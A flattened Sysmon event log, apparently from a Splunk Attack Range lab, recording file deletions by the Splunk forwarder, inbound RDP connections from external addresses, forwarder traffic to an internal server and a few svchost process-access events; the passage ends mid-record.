23542300x8000000000000000982148Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:08.568{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4ABA0EBD2EA02D1658A8251DE784AAE,SHA256=930FB41FA26208C7BCCDC3287DBCD5525A5B3B9AB223BFA1372F6BE87EE4B3DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057843Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:06.119{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.97-63173-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057842Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:08.552{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=57F9DB3E9ADF1488A0A1D83B5A755340,SHA256=73CE7536B80115F296EC3945DE103F24BB808494ADA66017BB47ECD8AD4BD44F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982147Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:08.255{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=883784E577ECBAC3C7AE362B86A1FAD7,SHA256=647BADAA7840A6337B65DC0AA8AB1C41B64EA360BD93B24BF742DEC052F253C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982146Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:08.255{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A94362FE487C460CADF60BB173FC2287,SHA256=8B4F78AE4D22A914B9B049AC7FE463C158DBD1F9848CECC2A51B7D55F73E6454,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982145Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:05.539{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-53788-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982149Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:09.583{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F15F9FA7EB77D85744F85A7EAB04680D,SHA256=1070458490DC1C156418DBBD6137EB8EAA9A11ED7208A217B769F3E3FE2FA1AA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057846Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:08.035{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54315-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001057845Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:07.763{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.97-51180-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x8000000000000000982150Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:10.583{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAF047A36EB75DAFAFDFBC68A65BB125,SHA256=7F6B2AFFBD91AF7A73BEE1A235586F1070FBDE98B7A77EBC09BBF529A39C88EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057849Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:09.009{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.97-54914-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057848Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:10.365{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E78527A297571465DF8587294573940,SHA256=D1126BFC8875CE02C8EA718A8C0E5CEB1FE14CB750457B454590A510C5FA45B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057847Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:10.068{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1F19449FAFF1D6573B8AC802981B0BA,SHA256=0F7AE0870F5A05209DEAF41C793C196FDCF7B422ABD8FD14161277468445872C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982151Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:11.802{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E863A5021E7A0525FD508B743DD9372C,SHA256=B8998F2FD0F76B314B1901BC96C77F0BFAFFD7C405C92DAEBBF54D6610147BEC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057853Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:09.951{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.97-57554-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057852Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:09.471{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.97-56246-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057851Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:11.537{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5607952E8279BB33D1574F0D8A9E8978,SHA256=216C03A8EAA083EBB94B1283D7D2E017592224102FE3C00A47FEE6B259D13FC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057850Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:11.099{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CD7761DC22615C9BE8048422A4E06F4F,SHA256=05C85D0F03E0E285E05DA19695DDE0318C9225DFB26944843BB7E6D18302839E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057855Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:12.959{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34A34E067B99325E4487FC7EFCA94D80,SHA256=1C72D4A3953B0445037E8831E42025603361A5897D142449D4987A547FE1EF46,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057854Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:12.225{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA45AA63FB1346211C29392692BB16B7,SHA256=CFB68BAC64673254263C2DD7859064CC114E77F7D6F445519270DE3AC2F93A6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057856Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:13.428{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96045AD79804A4F20B9188701852F8FF,SHA256=FE9194A3AB2570861AA7CBC34ABE37BB5F53C5AA10AB9EECBDB0F814FF359493,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982153Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:09.813{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59591-false10.0.1.12-8000- 23542300x8000000000000000982152Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:13.005{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=398DF782EAE79B78E9DC121ED6394911,SHA256=BF367795245F11A78BDF3EDA2DE42EA37DBA16CD3C6C9C50E7357C3DA465B7E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057859Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:13.128{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54316-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001057858Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:11.611{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58026-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057857Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:14.475{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=753B1E3AF8923BB2FD55CD344E051473,SHA256=67DF1890980BFC2C50987AECFC2264EBBE8C6A6494598FA34D0169EA44B3710F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982155Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:14.239{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23B4F64D240090056C0D4368B2EBA45D,SHA256=8530DD02ED322BC8262DF380377CF7A5F2A97670FA85C98D5A123E07C104A172,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982154Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:14.052{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057861Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:15.662{5EBD8912-8CD0-6151-3000-00000000FD01}1956NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057860Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:15.522{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9FD7F469C6CD0FF93FBE7DC295C228D1,SHA256=7FDE6BFC62041970378BFE2700D15C8584B5F1BBA9315B767C9AFF3CC86E396A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982157Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:12.672{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59592-false10.0.1.12-8089- 23542300x8000000000000000982156Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:15.474{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F082076898F29B16C036F0633C1BD5A2,SHA256=21BBD3701760F4641E8502FE10F7E1AB62FCBC56D213D24EAF1C94E30843235F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982161Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:13.510{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.115-55791-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982160Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:16.661{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B7550C6C06C1F383833C7DC8CA87DD9,SHA256=DDD3BEEEC7C51C8A5C73633B9EE9A21A1D94F672E1E6694367DB32A919C90AA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057862Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:16.522{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FABBFDCE0626413502DE098F17226844,SHA256=77CB0534241978C89957456B8350F0A1A628D9DDD36B614B4329EC29D5DF85ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982159Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:16.114{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BCDAC06172070ADA304576C2841CC6C1,SHA256=6948CDBB9552BBC3963C602841C7918B3205EFCEB55BD43C8A125F7AAEA23723,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982158Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:16.114{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=883784E577ECBAC3C7AE362B86A1FAD7,SHA256=647BADAA7840A6337B65DC0AA8AB1C41B64EA360BD93B24BF742DEC052F253C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982162Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:17.880{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=757DF79300DED36F251EFA8DDC14C3F7,SHA256=31310BC9EF3E866ABF78F0B51CC296E1F0B1EE65FFA5EA33B1EC3491571D05ED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057864Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:17.538{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1109AFE88A92A2AE5FFD901BD7BEB1A0,SHA256=540A5DD19D9536F0D7168FE9783DB58C4B4F44FF8A4FAE1AF0E8875A6829C26D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057863Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:17.319{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15637435A6F10AC414D28C4683908D67,SHA256=71EC0AA8F6611998A30B0B57441860372259B225B4CA9B25ECBD5410757E296F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057867Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:18.538{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B2D7CFEBA442044C9CC76A010BFB5CA,SHA256=7F3EBE8DB099968274DFDAF5491E1DFCECA698F11A377CD8065C11205698C222,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982163Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:18.474{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BCDAC06172070ADA304576C2841CC6C1,SHA256=6948CDBB9552BBC3963C602841C7918B3205EFCEB55BD43C8A125F7AAEA23723,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057866Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:15.934{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-62708-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001057865Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:15.581{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54317-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x80000000000000001057870Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:18.040{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63917-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057869Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:19.663{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F58E8D8E5AD0A140A79561B9E37E0651,SHA256=AEDE73DE16C09A2E30428FF30D1625A28592BF63B8A64DDAC943758FE14D06D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057868Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:19.569{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EBC38ACB9107A466489F633DB9E1666,SHA256=C3258BBB836968394BD61267ABA00F163049AF0236984C1E15E0022A8172B741,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000982166Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:15.813{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59593-false10.0.1.12-8000- 354300x8000000000000000982165Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:15.628{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-63230-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000982164Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:19.068{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4421BBE36008CE3679ABD757B60D6AD2,SHA256=56579A2CE11FFC08E582F79E99C6DF306609F029781AB1722CA98DF7E7889DFE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057874Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:19.019{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54318-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057873Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:20.788{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB9B7C91493BEA797F5E5B02BF227B10,SHA256=182273BB0B9721F78687965FCB59AA48A469B8F4F55097F11DBB30008B35A5C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982168Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:20.724{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=728A4741C2B93D5836B77951D1DEDB92,SHA256=D6B8D4E84F5E3D20646F5988216D6748E561294FC8A34D5D734A306385494094,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000982167Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:28:20.083{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B36D7A6881F598D0D5C9EB572AD02DCA,SHA256=A1AF2E4C1330CFD16090245EE3F1D845D40C5FDE531DC204AA7AA632C71E5280,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057872Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:20.366{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1600-00000000FD01}1296C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001057871Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:20.366{5EBD8912-8CBF-6151-0D00-00000000FD01}9005808C:\Windows\system32\svchost.exe{5EBD8912-8CC0-6151-1200-00000000FD01}484C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001057877Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:28:21.897{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 